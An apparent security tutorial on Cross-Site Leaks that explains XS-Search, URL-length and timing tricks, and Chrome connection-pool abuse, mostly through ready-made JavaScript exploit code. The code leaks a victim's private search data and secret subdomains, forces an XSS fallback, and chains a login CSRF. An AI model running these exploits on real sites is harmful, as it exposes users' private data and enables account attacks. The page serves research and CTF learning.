XS-Leaks

Leaking information cross-site, often through private search features

Cross-Site Leaks (XS-Leaks) are a collection of techniques that allow an attacker to infer information about another site. This may be privacy-related or, in the case of a private search functionality, XS-Search can leak full strings character by character. The https://xsleaks.dev/ wiki collects many techniques with clear and concise information and should be your first source. Below are some more detailed explanations and ready-made exploits, as well as some techniques not mentioned there.

Examples

An XS-Leak technique can only return a boolean answer: true or false. The questions we can ask are important to assess the impact. For example:

  • Is the user currently logged in? -> By detecting a redirect to the login page

  • Does the user have access to this group? -> By detecting an access denied page

  • Is there a note containing "a"? -> By counting the number of iframes in search results

This last idea, where we target search functionality, is by far the most powerful and is called XS-Search. It has more than privacy implications, because once the attacker guesses one correct character, they can expand their guess from there to find more and more characters that still match results. In the end, all data that the search functionality queries can be leaked.

Other use cases of XS-Leaks can be found in CSS Injection, where it is used to exfiltrate the result of selectors with a strict CSP (XS-Leaks without network).

Some techniques require a window reference, which can be acquired by calling window.open() or iframing the URL and reading .contentWindow. Some techniques work without this though, and even bypass Cross-Origin-Opener-Policy.

One of the most classic techniques involves the window.length property which is exposed cross-origin. It holds the number of frames inside of a window. This includes <iframe> and <embed>/<object> for some specific types.
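For example, imagine a private note app whose search page renders a preview frame for every matching note (a hypothetical page, all paths made up):

```html
<!-- Search results page at /search?q=a: one preview frame per match -->
<h1>Search results</h1>
<iframe src="/note/1"></iframe>
<iframe src="/note/2"></iframe>
```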

The above example generates iframes for each search result, so a successful query will have more frames than an unsuccessful one. We can detect this by opening the search page, waiting for it to load, and checking its .length.
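A minimal sketch of such a check, assuming the search page lives at /search?q= on the target:

```javascript
function test(query) {
  return new Promise((resolve) => {
    const win = window.open(
      'https://target.example/search?q=' + encodeURIComponent(query)
    );
    // Wait a fixed amount of time for the page to load, then count frames
    setTimeout(() => {
      resolve(win.length > 0); // any frames = at least one result
      win.close();
    }, 2000);
  });
}
```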

You can then call this test() function with await to learn if the logged-in user has a note containing the query. Do this in a loop for every character, expanding the search each time you find a successful result to leak the full string:
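A sketch of that loop; the charset is an assumption about the data being searched (run inside an async function):

```javascript
const CHARSET = 'abcdefghijklmnopqrstuvwxyz0123456789';

let known = '';
while (true) {
  let found = false;
  for (const c of CHARSET) {
    if (await test(known + c)) {
      known += c; // this character still matches a note, keep it
      found = true;
      break;
    }
  }
  if (!found) break; // no character extends the match anymore
  console.log(known);
}
```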

Alternatively, you may also be able to detect the negative result by comparing to 0:
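For instance, if a no-results page is guaranteed to contain no frames at all, the check inside test() can simply be:

```javascript
resolve(win.length !== 0); // any frame at all means the query matched
```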

If you are server-side redirected to 2 URLs of different lengths depending on whether the search was successful or not, this is detectable using the Max URL Length. If the final URL exceeds 2MB (2097152 characters), the browser will show a failure page at about:blank#blocked, which is same-origin with the initiator.

This is exploitable because we can pad the length of the URL with a hash fragment (#), which is kept across server-side redirects. You have to calculate the amount of padding required to make the shorter of the 2 options barely go through, while the longer gets blocked for going over the limit.
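A sketch of how this could look, assuming the search endpoint redirects to /true or /false on the target (the exact padding may need off-by-one tuning):

```javascript
const LIMIT = 2097152; // Chrome's maximum URL length
const LONGEST = 'https://target.example/false'.length; // longest redirect target

function test(query) {
  return new Promise((resolve) => {
    // The fragment survives the server-side redirect, so /true barely
    // stays under the limit while /false exceeds it and gets blocked
    const win = window.open(
      'https://target.example/search?q=' + encodeURIComponent(query) +
      '#' + 'a'.repeat(LIMIT - LONGEST)
    );
    setTimeout(() => {
      try {
        win.origin; // readable = still same-origin about:blank#blocked
        resolve(false); // the longer /false redirect was blocked
      } catch {
        resolve(true); // cross-origin = the shorter /true redirect loaded
      }
      win.close();
    }, 2000);
  });
}
```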

In the above example, /true is shorter than /false. After 2 seconds, we check whether the window is still same-origin or successfully went cross-origin.

If your target is iframable (and cookies are SameSite=None), a much faster technique is possible using the fact that onload= is triggered cross-origin. We can simply load all possible characters at the same time, and only one should trigger the event, because it barely navigated successfully. At that point we know the correct character and can continue on to the next.
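A minimal sketch of this parallel variant, reusing the LIMIT and LONGEST constants from above:

```javascript
function testAll(prefix, charset) {
  return new Promise((resolve) => {
    for (const c of charset) {
      const iframe = document.createElement('iframe');
      iframe.src =
        'https://target.example/search?q=' + encodeURIComponent(prefix + c) +
        '#' + 'a'.repeat(LIMIT - LONGEST);
      // Only the barely-successful navigation fires onload
      iframe.onload = () => resolve(prefix + c);
      document.body.appendChild(iframe);
    }
  });
}
```

Calling this repeatedly with the growing prefix leaks one character per round instead of one per query.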

This writeup shows an implementation of this technique:

Measure top-level load time

It's easy to measure how long it takes to load an iframe using the onload= event. But doing so top-level on a site that doesn't allow iframing is harder, although still possible using this trick.

We essentially let it load, and at the same time perform some hashchanges on it, which don't reload the tab. These should insert history entries, but if the target is busy, they may be skipped. Using history.length it becomes possible to check how many navigations there were, telling us if the target was busy or not at some specific point in time.
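A rough sketch of this idea; the URL, the timings, and the /empty.html page on our own origin are all assumptions:

```javascript
const sleep = (ms) => new Promise((r) => setTimeout(r, ms));

async function countHistoryEntries(loadTimeMs, attempts = 5) {
  const win = window.open('https://target.example/heavy');
  // Hash navigations normally add history entries without reloading,
  // but they may be skipped while the target's main thread is busy
  const timer = setInterval(() => {
    win.location = 'https://target.example/heavy#' + Math.random();
  }, loadTimeMs / attempts);
  await sleep(loadTimeMs);
  clearInterval(timer);
  // history.length is only readable once the window is same-origin again
  win.location = location.origin + '/empty.html';
  await sleep(500);
  const entries = win.history.length;
  win.close();
  return entries; // fewer entries than a calibrated baseline = target was busy
}
```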

It allows you to detect the difference between while (true) {} and while (false) {} on the target. If there is any heavy operation, and you can confidently guess when that will take place on the target, set the loading time to this in the exploit.

One situation where this can be useful is detecting ReDoS (Catastrophic Backtracking), because JavaScript's RegExp can be exponential too. Another use case is querySelector or jQuery's similar implementation, when you have an injection into one of these functions. This can create expensive lookups that short-circuit if a match is found, creating a timing difference. This difference is then detectable using the above technique.
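As a quick illustration of how bad RegExp backtracking can get, this classic pattern takes exponential time to fail:

```javascript
// Nested quantifiers force the engine to try exponentially many ways to
// split the input before concluding there is no match
const evil = /^(a+)+$/;
console.time('redos');
evil.test('a'.repeat(30) + 'b');
console.timeEnd('redos'); // takes seconds; every extra 'a' roughly doubles it
```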

More JavaScript execution timing attacks can be found here:

Connection Pool

Chrome limits how many connections can be active at the same time. For HTTP requests, this limit is 6 per origin (origin of the request URL) and 256 globally. Because this limit is shared across sites, an attacker can affect it for the target site, and the other way around.

Primitives

To keep the connection pool (almost) full, you should host a server that keeps the connection open for a while. Below is a simple Go server that has some endpoints for sleeping:
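A minimal sketch of such a server; the /sleep/<seconds> endpoint shape is an assumption, and TLS (needed for https:// requests) is assumed to be terminated by a reverse proxy in front:

```go
package main

import (
	"fmt"
	"net/http"
	"strconv"
	"strings"
	"time"
)

func main() {
	// GET /sleep/30 holds the connection open for 30 seconds
	http.HandleFunc("/sleep/", func(w http.ResponseWriter, r *http.Request) {
		secs, err := strconv.Atoi(strings.TrimPrefix(r.URL.Path, "/sleep/"))
		if err != nil {
			http.Error(w, "bad duration", http.StatusBadRequest)
			return
		}
		time.Sleep(time.Duration(secs) * time.Second)
		fmt.Fprintln(w, "done")
	})
	http.ListenAndServe(":8000", nil)
}
```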

Here are some useful functions that all the exploits below will use:
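A sketch of these helpers; the names block() and release_once() are assumptions used throughout the examples below, and the unique subdomains (wildcard DNS and certificate assumed) work around Chrome's 6-per-host limit:

```javascript
const POOL = 256; // Chrome's global connection limit
const blockers = [];

const sleep = (ms) => new Promise((r) => setTimeout(r, ms));

// Fill n slots of the pool with requests that hang on the sleeping server
function block(n = POOL) {
  for (let i = 0; i < n; i++) {
    const controller = new AbortController();
    fetch(`https://${i}-${Date.now()}.attacker.example:8000/sleep/60`, {
      mode: 'no-cors',
      signal: controller.signal,
    }).catch(() => {}); // hangs until aborted or the sleep finishes
    blockers.push(controller);
  }
}

// Abort one hanging request, freeing up exactly one slot
function release_once() {
  blockers.pop()?.abort();
}
```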

Counting requests

For XS-Leaks, the most useful effect is that if the pool is almost full (one slot remaining), the target and the attacker share one single slot for making connections. If the attacker's page keeps sending requests one after the other, measuring the time in between, they can detect whenever the target gets in between with requests of its own. With this, you can count the target's requests.
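A sketch of this idea using the helpers above; the 100ms threshold is an assumption that depends on how fast your own server responds:

```javascript
async function countRequests(durationMs, thresholdMs = 100) {
  let count = 0;
  const end = performance.now() + durationMs;
  while (performance.now() < end) {
    const start = performance.now();
    // Our request and the target's compete for the single free slot
    await fetch(`https://count.attacker.example:8000/`, {
      mode: 'no-cors',
      cache: 'no-store',
    });
    if (performance.now() - start > thresholdMs) {
      count++; // an unusually long gap means the target got in between
    }
  }
  return count;
}
```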

Writeup explaining connection pool abuse to count CSS exfiltration requests

Below is an example that measures the time a fetch() takes on a remote website. This can be done by having the target's request "stalled" (waiting for a slot to open up). Then open up one slot by calling blocker.abort() to let the target take its spot, and immediately start fetching yourself. This resolves the target's fetch first and then starts on our request. If we compare the time at which we called the fetch function ourselves to when its DNS lookup started, we get a precise measurement of how long it was stalled, meaning how long the target's request took.
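A sketch of this measurement using the Resource Timing API; it assumes the target's request is currently stalled and that our server sends a Timing-Allow-Origin header so domainLookupStart is exposed:

```javascript
async function measureTargetFetch() {
  const url = `https://measure.attacker.example:8000/?${Math.random()}`;
  const start = performance.now();
  release_once(); // the target's stalled request takes the freed slot
  await fetch(url, { mode: 'no-cors' }); // we queue up right behind it
  // Our request only started once the target's finished, so the time it
  // spent waiting equals the duration of the target's request
  const [entry] = performance.getEntriesByName(url);
  return entry.domainLookupStart - start;
}
```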

The result of 93ms is very close to the real total time the fetch took: 55 + 32 + 5 = 92ms!

Leaking subdomains

The order in which stalled requests are taken from the queue is not First-In First-Out (FIFO) as you may expect. Instead, they are ordered by some arbitrary properties of the request. Firstly, higher-priority requests are executed first (table). If these tie, the GroupId (source code) is compared and the smallest goes first.

The GroupId consists of the following properties, which are evaluated in order; if any of them tie, the next property is checked.

  1. Port (e.g. 80 or 8000)

  2. Scheme ("http" or "https", lexicographically)

  3. Host (e.g. sub.example.com, lexicographically)

If the priority, port and scheme are the same, the hosts are compared lexicographically. Remember, this is a comparison between an attacker's request and a target's request, where the attacker can detect if their request was stalled or not.

If the target requested some random secret subdomain, we can compare it with our own subdomain to learn its value character by character. That is the idea of the writeup below:

Leak subdomain using connection pool ordering

In terms of the exploit, see their version as well as my version. It will likely take some effort to apply to your use case, but the basic idea is that you need some simple way to trigger the target request repeatedly so you can compare the subdomains.
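Both versions boil down to something like the following sketch. triggerTargetRequest() is a made-up stand-in for whatever makes the victim request https://<secret>.target.example/, and our own wildcard domain must be requested with the same priority, scheme, and port as the target's request, since those are compared before the host:

```javascript
async function guessSortsFirst(guess) {
  block(); // fill the pool so both requests stall in the queue
  triggerTargetRequest();
  await sleep(500);

  const start = performance.now();
  const probe = fetch(`https://${guess}.attacker.example/`, {
    mode: 'no-cors',
    cache: 'no-store',
  }).catch(() => {});
  release_once(); // one slot opens: the smallest GroupId goes first
  await probe;

  // A short duration means our guess sorted before the secret host
  return performance.now() - start < 100;
}
```

By adjusting the guess until the ordering flips, each character of the secret can be narrowed down with a binary search.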

Delaying timing

One of the simpler uses of the Connection Pool, not necessarily related to XS-Leaks, is delaying network requests of other sites. You can completely halt the browser by filling up the connection pool, then let requests go through one by one.

An example is XSS that requires something to go wrong, like a fallback being reached after a timeout of 5 seconds:
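As a hypothetical example of such a target (the fallback parameter is made up):

```javascript
// On the target: navigate to /safe, but if it takes longer than
// 5 seconds, fall back to a URL the attacker can influence
const fallback = new URLSearchParams(location.search).get('fallback');
const timer = setTimeout(() => {
  location = fallback; // e.g. a javascript: URL -> XSS
}, 5000);
fetch('/safe').then(() => {
  clearTimeout(timer);
  location = '/safe';
});
```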

You can exploit this by exhausting all but one socket initially, so you can open the target in a new window. Right after its connection is started, we block the connection pool fully, so it cannot load any subresources or perform its /safe navigation. 6 seconds later, we open it up again and the fallback triggers.
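Using the helpers from before, that could look like the following sketch (timings are guesses, run inside an async function):

```javascript
block(POOL - 1); // leave exactly one slot for the page's own navigation
const win = window.open(
  'https://target.example/?fallback=javascript:alert(origin)'
);
await sleep(100); // the document request has taken the last free slot
block(1);          // fully block the pool: fetch('/safe') now stalls
await sleep(6000); // the 5-second fallback timeout fires in the meantime
blockers.forEach((c) => c.abort()); // open the pool up again
```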

Another use case is Client-Side Race Conditions, where there is a specific timing you want your payload to hit which is hard to guess otherwise. An example is a script that fetches data and then saves it again to the current account. An exploit in this case would be:

  1. Fetch data (as victim)

  2. Login CSRF as the attacker

  3. Save data (as attacker)
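The connection pool will help us get in between these steps. A rough sketch, where the /resave page and the loginCSRF() helper (submitting a login form for the attacker's account) are made up:

```javascript
block(POOL - 1); // leave one slot for the victim's GET of the data
const win = window.open('https://target.example/resave');
await sleep(500); // step 1: the data was fetched as the victim
block(1);         // pool is now full: the save request stalls
loginCSRF();      // step 2: queue the attacker's login (a navigation)
release_once();   // navigations typically have higher priority, so the
                  //   login goes through first
await sleep(500);
release_once();   // step 3: the stalled save now runs as the attacker
```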

Then the attacker would be able to read the victim's data from their own account. In the following writeup, this technique was part of my solution:

Note: during the CTF challenge, I had a weird issue where release_once() would let through more than 1 request. It had to do with many other images being in the queue, which for some reason let other requests go through at the same time. This was solved by pre-loading the images, which may also be possible in your situation.
